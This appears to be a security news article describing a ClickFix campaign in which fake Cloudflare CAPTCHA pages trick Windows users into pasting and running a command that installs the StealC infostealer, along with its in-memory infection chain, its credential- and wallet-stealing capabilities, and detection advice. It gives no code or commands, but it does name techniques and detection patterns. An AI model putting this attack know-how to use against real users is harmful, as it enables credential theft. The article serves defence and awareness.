StealC Malware Targets Windows Users via Deceptive CAPTCHA Pages
A sophisticated cyberattack campaign is currently targeting Windows users by exploiting fake CAPTCHA verification pages to deploy the StealC information-stealing malware. This campaign combines social engineering tactics with advanced technical methods to extract sensitive data from unsuspecting victims.
Attack Overview
The attack initiates when users visit compromised websites that display fraudulent Cloudflare security checks. These deceptive pages prompt users to perform a series of actions:
1. Press the Windows Key + R to open the Run dialog box.
2. Press Ctrl + V to paste a command that has been silently copied to the clipboard.
3. Press Enter to execute the command.
This method, known as the ClickFix technique, manipulates users into believing they are completing a routine security verification, while in reality, they are initiating the installation of malicious software.
Infection Chain and Evasion Tactics
Once the user executes the command, a multi-stage infection process begins:
1. Shellcode Execution: The initial command connects to a remote server to download position-independent shellcode generated using the Donut framework.
2. PE Downloader Deployment: The shellcode loads a custom Portable Executable (PE) downloader compiled with Microsoft Visual C++.
3. StealC Malware Injection: The downloader retrieves the final StealC payload and injects it into ‘svchost.exe,’ a legitimate Windows service process.
This fileless execution technique operates entirely in memory, leaving minimal traces on the system and making detection by traditional antivirus solutions challenging.
StealC Malware Capabilities
StealC is a potent information stealer with the following capabilities:
– Credential Theft: Extracts login credentials from browsers such as Chrome, Edge, and Firefox.
– Cryptocurrency Wallet Access: Targets wallet extensions including MetaMask and Coinbase Wallet.
– Email Data Extraction: Harvests Outlook email credentials.
– System Information Collection: Gathers comprehensive system data and captures screenshots.
The malware communicates with its command-and-control (C2) server using HTTP traffic encrypted with Base64 and RC4 encoding. It employs dual-layer string obfuscation to conceal critical configuration data, including C2 server URLs, targeted file paths, and database queries.
Detection and Mitigation Strategies
To defend against such sophisticated attacks, organizations should implement the following measures:
– Monitor User-Agent Strings: Be vigilant for suspicious User-Agent strings like Loader, which may indicate malicious activity.
– Flag PowerShell Executions: Set up alerts for PowerShell executions with encoded commands, as these can be indicative of malicious scripts.
– Detect Shellcode Injection Patterns: Monitor for patterns associated with shellcode injection, such as the use of VirtualAlloc and CreateThread functions.
– Monitor Access to Credential Databases: Keep an eye on unusual access to browser credential databases, which may signal data extraction attempts.
User Awareness and Training
Educating users about the risks of executing commands from untrusted sources is crucial. Users should be trained to recognize and avoid deceptive prompts that instruct them to perform actions like opening the Run dialog box and executing commands.
Conclusion
The current wave of ClickFix attacks deploying StealC malware underscores the evolving nature of cyber threats that blend social engineering with technical sophistication. By staying informed about these tactics and implementing robust detection and mitigation strategies, organizations can better protect their systems and sensitive data from such insidious attacks.
